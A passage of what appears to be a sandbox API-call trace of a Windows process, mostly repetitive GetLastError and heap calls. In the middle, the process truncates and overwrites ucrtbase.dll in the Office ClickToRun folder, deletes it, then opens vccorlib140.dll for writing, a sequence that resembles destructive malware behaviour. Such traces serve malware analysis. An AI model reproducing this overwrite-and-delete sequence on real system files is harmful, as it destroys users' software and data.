[0097.988] GetLastError () returned 0x0 [0097.988] SetLastError (dwErrCode=0x0) [0097.988] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.989] GetLastError () returned 0x0 [0097.989] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.990] GetLastError () returned 0x0 [0097.990] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.991] GetLastError () returned 0x0 [0097.991] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.992] GetLastError () returned 0x0 [0097.992] SetLastError (dwErrCode=0x0) [0097.993] GetLastError () returned 0x0 [0097.993] SetLastError (dwErrCode=0x0) [0097.993] GetLastError () returned 0x0 [0097.993] SetLastError (dwErrCode=0x0) [0097.993] GetLastError () returned 0x0 [0097.993] SetLastError (dwErrCode=0x0) [0097.993] GetLastError () returned 0x0 [0097.993] SetLastError (dwErrCode=0x0) [0097.993] GetLastError () returned 0x0 [0097.993] SetLastError (dwErrCode=0x0) [0097.993] GetLastError () returned 0x0 [0097.993] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.994] GetLastError () returned 0x0 [0097.994] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.995] GetLastError () returned 0x0 [0097.995] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.996] GetLastError () returned 0x0 [0097.996] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.997] GetLastError () returned 0x0 [0097.997] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.998] GetLastError () returned 0x0 [0097.998] SetLastError (dwErrCode=0x0) [0097.999] GetLastError () returned 0x0 [0097.999] SetLastError (dwErrCode=0x0) [0097.999] GetLastError () returned 0x0 [0097.999] SetLastError (dwErrCode=0x0) [0097.999] GetLastError () returned 0x0 [0097.999] SetLastError (dwErrCode=0x0) [0098.094] GetLastError () returned 0x0 [0098.094] SetLastError (dwErrCode=0x0) [0098.115] CloseHandle (hObject=0x418) returned 1 [0098.115] CloseHandle (hObject=0x368) returned 1 [0098.115] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.124] GetFileType (hFile=0x368) returned 0x1 [0098.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0098.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0098.125] GetLastError () returned 0xb7 [0098.125] SetLastError (dwErrCode=0xb7) [0098.125] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0098.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0098.127] CloseHandle (hObject=0x368) returned 1 [0098.127] AreFileApisANSI () returned 1 [0098.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0098.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0098.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0098.127] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll")) returned 1 [0098.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0098.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.129] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0x1, dwReserved1=0x0, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0098.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0098.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0098.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0098.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.130] AreFileApisANSI () returned 1 [0098.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll", lpUsedDefaultChar=0x0) returned 74 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0098.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.130] AreFileApisANSI () returned 1 [0098.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0098.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85120 [0098.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0098.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.131] GetFileType (hFile=0x368) returned 0x1 [0098.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0098.131] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.131] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.131] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.131] CloseHandle (hObject=0x368) returned 1 [0098.132] AreFileApisANSI () returned 1 [0098.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0098.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85260 [0098.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0098.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.132] GetFileType (hFile=0x368) returned 0x1 [0098.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0098.132] CloseHandle (hObject=0x368) returned 1 [0098.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.134] AreFileApisANSI () returned 1 [0098.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85bc0 [0098.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85bc0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0098.134] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0)) returned 1 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85bc0 | out: hHeap=0x20000) returned 1 [0098.134] AreFileApisANSI () returned 1 [0098.134] 